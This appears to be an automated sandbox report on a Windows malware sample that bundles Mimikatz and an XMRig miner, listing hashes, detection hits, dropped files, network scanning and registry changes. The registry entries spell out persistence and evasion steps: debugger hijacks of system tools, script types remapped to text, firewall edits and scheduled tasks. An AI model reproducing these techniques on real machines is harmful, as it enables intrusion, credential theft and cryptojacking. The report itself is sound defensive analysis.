Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
25/05/2024, 21:15
Behavioral task
behavioral1
Sample
2024052441384b372f85b921a8554ba998731592hacktoolsicedidmimikatz.exe
Resource
win7-20240508-en
General
-
Target
2024052441384b372f85b921a8554ba998731592hacktoolsicedidmimikatz.exe
-
Size
7.6MB
-
MD5
41384b372f85b921a8554ba998731592
-
SHA1
8c1c6dc8553ec45c5c040d09ec4b3ddff80a061a
-
SHA256
169cd0ebf379d78b405f91a9b7b6b1b1d48ca996b67f3ca38ef88457217dd018
-
SHA512
dccfd6b6869286d62a4db5e3d203a89418c0f1a032ce183c984ebc39c38ebb92bfebc6b3520e0e307e6ac70f4b5314cd27ebde3f02b36d6ad6067612261bc397
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1444 created 2100 1444 tpmbzsb.exe 37 -
Contacts a large (30487) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/4516-182-0x00007FF6059A0000-0x00007FF605AC0000-memory.dmp xmrig behavioral2/memory/4516-199-0x00007FF6059A0000-0x00007FF605AC0000-memory.dmp xmrig behavioral2/memory/4516-205-0x00007FF6059A0000-0x00007FF605AC0000-memory.dmp xmrig behavioral2/memory/4516-217-0x00007FF6059A0000-0x00007FF605AC0000-memory.dmp xmrig behavioral2/memory/4516-222-0x00007FF6059A0000-0x00007FF605AC0000-memory.dmp xmrig behavioral2/memory/4516-233-0x00007FF6059A0000-0x00007FF605AC0000-memory.dmp xmrig behavioral2/memory/4516-250-0x00007FF6059A0000-0x00007FF605AC0000-memory.dmp xmrig behavioral2/memory/4516-251-0x00007FF6059A0000-0x00007FF605AC0000-memory.dmp xmrig behavioral2/memory/4516-255-0x00007FF6059A0000-0x00007FF605AC0000-memory.dmp xmrig behavioral2/memory/4516-305-0x00007FF6059A0000-0x00007FF605AC0000-memory.dmp xmrig behavioral2/memory/4516-311-0x00007FF6059A0000-0x00007FF605AC0000-memory.dmp xmrig behavioral2/memory/4516-313-0x00007FF6059A0000-0x00007FF605AC0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/3212-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3212-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0007000000023402-6.dat mimikatz behavioral2/memory/3620-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2780-138-0x00007FF78DBE0000-0x00007FF78DCCE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts tpmbzsb.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts tpmbzsb.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1276 netsh.exe 408 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tpmbzsb.exe -
Executes dropped EXE 29 IoCs
pid Process 3620 tpmbzsb.exe 1444 tpmbzsb.exe 1136 wpcap.exe 2364 bnbbwekbp.exe 2780 vfshost.exe 2628 asrwllflb.exe 4712 xohudmc.exe 2060 tyttue.exe 4516 tbubha.exe 1552 asrwllflb.exe 1044 asrwllflb.exe 2028 asrwllflb.exe 5068 asrwllflb.exe 4724 asrwllflb.exe 1172 tpmbzsb.exe 3096 asrwllflb.exe 1732 asrwllflb.exe 5108 asrwllflb.exe 5080 asrwllflb.exe 1608 asrwllflb.exe 3860 asrwllflb.exe 3268 asrwllflb.exe 4836 asrwllflb.exe 2556 asrwllflb.exe 4608 asrwllflb.exe 948 asrwllflb.exe 3304 asrwllflb.exe 4508 tmazgcsbi.exe 5932 tpmbzsb.exe -
Loads dropped DLL 12 IoCs
pid Process 1136 wpcap.exe 1136 wpcap.exe 1136 wpcap.exe 1136 wpcap.exe 1136 wpcap.exe 1136 wpcap.exe 1136 wpcap.exe 1136 wpcap.exe 1136 wpcap.exe 2364 bnbbwekbp.exe 2364 bnbbwekbp.exe 2364 bnbbwekbp.exe -
resource yara_rule behavioral2/files/0x0007000000023447-134.dat upx behavioral2/memory/2780-135-0x00007FF78DBE0000-0x00007FF78DCCE000-memory.dmp upx behavioral2/memory/2780-138-0x00007FF78DBE0000-0x00007FF78DCCE000-memory.dmp upx behavioral2/files/0x0007000000023452-141.dat upx behavioral2/memory/2628-142-0x00007FF74CC20000-0x00007FF74CC7B000-memory.dmp upx behavioral2/memory/2628-146-0x00007FF74CC20000-0x00007FF74CC7B000-memory.dmp upx behavioral2/files/0x000700000002344f-163.dat upx behavioral2/memory/4516-164-0x00007FF6059A0000-0x00007FF605AC0000-memory.dmp upx behavioral2/memory/1552-171-0x00007FF74CC20000-0x00007FF74CC7B000-memory.dmp upx behavioral2/memory/1044-175-0x00007FF74CC20000-0x00007FF74CC7B000-memory.dmp upx behavioral2/memory/2028-179-0x00007FF74CC20000-0x00007FF74CC7B000-memory.dmp upx behavioral2/memory/4516-182-0x00007FF6059A0000-0x00007FF605AC0000-memory.dmp upx behavioral2/memory/5068-184-0x00007FF74CC20000-0x00007FF74CC7B000-memory.dmp upx behavioral2/memory/4724-193-0x00007FF74CC20000-0x00007FF74CC7B000-memory.dmp upx behavioral2/memory/3096-197-0x00007FF74CC20000-0x00007FF74CC7B000-memory.dmp upx behavioral2/memory/4516-199-0x00007FF6059A0000-0x00007FF605AC0000-memory.dmp upx behavioral2/memory/1732-202-0x00007FF74CC20000-0x00007FF74CC7B000-memory.dmp upx behavioral2/memory/4516-205-0x00007FF6059A0000-0x00007FF605AC0000-memory.dmp upx behavioral2/memory/5108-207-0x00007FF74CC20000-0x00007FF74CC7B000-memory.dmp upx behavioral2/memory/5080-211-0x00007FF74CC20000-0x00007FF74CC7B000-memory.dmp upx behavioral2/memory/1608-215-0x00007FF74CC20000-0x00007FF74CC7B000-memory.dmp upx behavioral2/memory/4516-217-0x00007FF6059A0000-0x00007FF605AC0000-memory.dmp upx behavioral2/memory/3860-220-0x00007FF74CC20000-0x00007FF74CC7B000-memory.dmp upx behavioral2/memory/4516-222-0x00007FF6059A0000-0x00007FF605AC0000-memory.dmp upx behavioral2/memory/3268-225-0x00007FF74CC20000-0x00007FF74CC7B000-memory.dmp upx behavioral2/memory/4836-229-0x00007FF74CC20000-0x00007FF74CC7B000-memory.dmp upx behavioral2/memory/2556-232-0x00007FF74CC20000-0x00007FF74CC7B000-memory.dmp upx behavioral2/memory/4516-233-0x00007FF6059A0000-0x00007FF605AC0000-memory.dmp upx behavioral2/memory/4608-235-0x00007FF74CC20000-0x00007FF74CC7B000-memory.dmp upx behavioral2/memory/948-237-0x00007FF74CC20000-0x00007FF74CC7B000-memory.dmp upx behavioral2/memory/3304-239-0x00007FF74CC20000-0x00007FF74CC7B000-memory.dmp upx behavioral2/memory/4516-250-0x00007FF6059A0000-0x00007FF605AC0000-memory.dmp upx behavioral2/memory/4516-251-0x00007FF6059A0000-0x00007FF605AC0000-memory.dmp upx behavioral2/memory/4516-255-0x00007FF6059A0000-0x00007FF605AC0000-memory.dmp upx behavioral2/memory/4516-305-0x00007FF6059A0000-0x00007FF605AC0000-memory.dmp upx behavioral2/memory/4516-311-0x00007FF6059A0000-0x00007FF605AC0000-memory.dmp upx behavioral2/memory/4516-313-0x00007FF6059A0000-0x00007FF605AC0000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 75 ifconfig.me 76 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\tyttue.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft tpmbzsb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content tpmbzsb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2326C1864DE719190C396A6E8734D8B4 tpmbzsb.exe File created C:\Windows\SysWOW64\tyttue.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2326C1864DE719190C396A6E8734D8B4 tpmbzsb.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE tpmbzsb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData tpmbzsb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache tpmbzsb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 tpmbzsb.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 tpmbzsb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies tpmbzsb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 tpmbzsb.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\qytbvbbbg\UnattendGC\specials\posh-0.dll tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\vimpcsvc.xml tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\specials\vimpcsvc.xml tpmbzsb.exe File opened for modification C:\Windows\qnbnbcbg\svschost.xml tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\specials\trch-1.dll tpmbzsb.exe File created C:\Windows\qnbnbcbg\vimpcsvc.xml tpmbzsb.exe File created C:\Windows\qytbvbbbg\bsfeuuzgm\wpcap.exe tpmbzsb.exe File created C:\Windows\qytbvbbbg\bsfeuuzgm\Packet.dll tpmbzsb.exe File opened for modification C:\Windows\qytbvbbbg\bsfeuuzgm\Packet.dll tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\specials\libeay32.dll tpmbzsb.exe File created C:\Windows\qnbnbcbg\spoolsrv.xml tpmbzsb.exe File opened for modification C:\Windows\qnbnbcbg\docmicfg.xml tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\AppCapture64.dll tpmbzsb.exe File created C:\Windows\qytbvbbbg\upbdrjv\swrpwe.exe tpmbzsb.exe File opened for modification C:\Windows\qnbnbcbg\tpmbzsb.exe 2024052441384b372f85b921a8554ba998731592hacktoolsicedidmimikatz.exe File created C:\Windows\qytbvbbbg\bsfeuuzgm\tmazgcsbi.exe tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\specials\tucl-1.dll tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\specials\spoolsrv.xml tpmbzsb.exe File opened for modification C:\Windows\qytbvbbbg\Corporate\log.txt cmd.exe File created C:\Windows\qytbvbbbg\UnattendGC\specials\cnli-1.dll tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\specials\zlib1.dll tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\specials\docmicfg.exe tpmbzsb.exe File created C:\Windows\qnbnbcbg\svschost.xml tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\svschost.xml tpmbzsb.exe File opened for modification C:\Windows\qnbnbcbg\spoolsrv.xml tpmbzsb.exe File opened for modification C:\Windows\qnbnbcbg\schoedcl.xml tpmbzsb.exe File created C:\Windows\qytbvbbbg\Corporate\mimidrv.sys tpmbzsb.exe File created C:\Windows\qytbvbbbg\bsfeuuzgm\bnbbwekbp.exe tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\specials\ssleay32.dll tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\specials\trfo-2.dll tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\specials\spoolsrv.exe tpmbzsb.exe File created C:\Windows\qytbvbbbg\Corporate\mimilib.dll tpmbzsb.exe File created C:\Windows\qnbnbcbg\docmicfg.xml tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\specials\libxml2.dll tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\specials\xdvl-0.dll tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\specials\svschost.exe tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\specials\schoedcl.exe tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\specials\tibe-2.dll tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\specials\ucl.dll tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\specials\vimpcsvc.exe tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\docmicfg.xml tpmbzsb.exe File created C:\Windows\qnbnbcbg\tpmbzsb.exe 2024052441384b372f85b921a8554ba998731592hacktoolsicedidmimikatz.exe File opened for modification C:\Windows\qytbvbbbg\bsfeuuzgm\Result.txt tmazgcsbi.exe File created C:\Windows\qytbvbbbg\UnattendGC\schoedcl.xml tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\specials\coli-0.dll tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\AppCapture32.dll tpmbzsb.exe File created C:\Windows\qytbvbbbg\bsfeuuzgm\scan.bat tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\specials\crli-0.dll tpmbzsb.exe File created C:\Windows\qnbnbcbg\schoedcl.xml tpmbzsb.exe File opened for modification C:\Windows\qnbnbcbg\vimpcsvc.xml tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\spoolsrv.xml tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\specials\schoedcl.xml tpmbzsb.exe File created C:\Windows\qytbvbbbg\bsfeuuzgm\wpcap.dll tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\Shellcode.ini tpmbzsb.exe File created C:\Windows\qytbvbbbg\bsfeuuzgm\ip.txt tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\specials\exma-1.dll tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\specials\docmicfg.xml tpmbzsb.exe File created C:\Windows\qytbvbbbg\Corporate\vfshost.exe tpmbzsb.exe File created C:\Windows\qytbvbbbg\UnattendGC\specials\svschost.xml tpmbzsb.exe File created C:\Windows\ime\tpmbzsb.exe tpmbzsb.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 456 sc.exe 2360 sc.exe 2112 sc.exe 1036 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0007000000023402-6.dat nsis_installer_2 behavioral2/files/0x000700000002340b-15.dat nsis_installer_1 behavioral2/files/0x000700000002340b-15.dat nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2408 schtasks.exe 4404 schtasks.exe 1088 schtasks.exe -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump asrwllflb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" asrwllflb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump asrwllflb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" asrwllflb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" tpmbzsb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" asrwllflb.exe Key created \REGISTRY\USER\.DEFAULT\Software asrwllflb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump asrwllflb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump asrwllflb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump asrwllflb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump asrwllflb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump asrwllflb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ tpmbzsb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" tpmbzsb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" asrwllflb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump asrwllflb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump asrwllflb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" asrwllflb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" asrwllflb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals asrwllflb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump asrwllflb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" asrwllflb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" asrwllflb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" asrwllflb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump asrwllflb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" asrwllflb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump asrwllflb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump asrwllflb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" asrwllflb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump asrwllflb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump asrwllflb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" asrwllflb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump asrwllflb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" tpmbzsb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" asrwllflb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" asrwllflb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" asrwllflb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing asrwllflb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump asrwllflb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing tpmbzsb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" tpmbzsb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" asrwllflb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump asrwllflb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" asrwllflb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" asrwllflb.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" tpmbzsb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ tpmbzsb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ tpmbzsb.exe -
Runs net.exe
-
